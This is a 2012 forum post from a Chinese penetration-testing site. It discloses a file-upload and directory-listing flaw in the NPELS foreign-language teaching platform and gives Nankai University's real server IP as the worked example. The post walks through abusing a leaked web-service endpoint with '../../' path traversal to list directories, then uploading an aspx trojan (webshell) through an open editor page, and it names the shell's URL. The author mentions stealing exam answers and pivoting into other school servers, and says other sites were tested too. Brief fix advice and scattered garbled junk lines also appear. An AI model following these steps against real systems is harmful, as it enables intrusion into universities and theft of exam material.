中国网络渗透测试联盟
标题:
新理念外语网络教学平台文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-12-4 11:10
标题:
新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
% A# M2 ?1 y/ {( _
/ q! B w# m0 R
详细说明:
* b6 z, W' M) V, a; g) b
. J- o. b/ F; w* a; V& r: P( P
以南开大学的为例:
) Q8 v- Q0 P8 m+ _# Q7 H
http://222.30.60.3/NPELS
9 F! h# T4 b5 u
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
/ u0 I9 k: s! a
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
! _* G) u9 R% q$ w
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
e s; H4 T, v" n" `6 C: r
</setting>
0 ~' z; T+ F1 W6 z0 V' _
及版本号
" |+ m/ N; R f9 B" _; G# R B
<add key="TVersion" value="1, 0, 0, 2187">
5 r* v: [( d L
</add>
( a) U. I+ ?& P* r
直接访问
8 m' O5 q8 |: }0 l
http://222.30.60.3/NPELS/CommonService.asmx
2 p: t1 s0 M4 x! Z) r" V: D6 F) t' {/ I
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
5 o9 |. O6 h* {
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1
, 0, 0, 2187
4 R! v) j& z2 c& s& G
进一步列目录(返回的网页很大,可以直接 wget 下来)
! N1 H/ _* F( O& m. ]; C
http://222.30.60.3/NPELS/CommonS ... List?version=../../
6 V+ R5 L \+ `+ Z A4 T
/ e" {" v. h' C- a* v
发现
- v6 E4 Q+ _# {- C1 Z3 \# s) i
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
+ G4 l$ f: f+ f" `/ F4 {
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
; R3 J( [0 [; p3 ^9 G& {! {
上传后继续列目录找到木马地址直接访问即可
j+ V" ^$ _9 K! y
1 ^2 {0 c6 @" }. g1 t6 j0 u) C4 O
OOXX
+ z. \6 _4 o n
6 P/ `! A9 Y' O M6 K" b, \
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
0 j: c1 n( c) M( u0 k- |! c
漏洞证明:
$ m- {' e; U! l9 _0 }$ U W& B
4 @* ]; y5 v6 l; Y; ?6 h. T
列目录:
. Y4 D9 U. B# W& S7 f! T1 m
http://222.30.60.3/NPELS/CommonS ... List?version=../../
% M8 a) n/ i4 M" k& m; b1 t$ [
文件上传:
% \! H4 B8 G7 {
http://222.30.60.3/npelsv/editor/editor.htm
' n8 L ^7 k; J- v1 Q' e5 l; m G
1 f; Q0 n" H5 R! R( n3 n! a A
上传木马:
; [3 J1 `. q; b6 T' p9 {9 i6 W
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
& S6 j1 n: Z8 B( f
6 B' j4 |% Y6 I& e
修复方案:
1 G" \ x! d/ E) F
好像考试系统必须使用 CommonService.asmx
' E# s7 T1 B. x& G* d
最好配置文件加密或者用别的方式不让它泄露出来
6 I- Y9 E/ j, M, C
并且检查或删除各上传入口,像
http://222.30.60.3/NPELS/Upload.aspx
一样
* T0 m L: @& z$ e
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2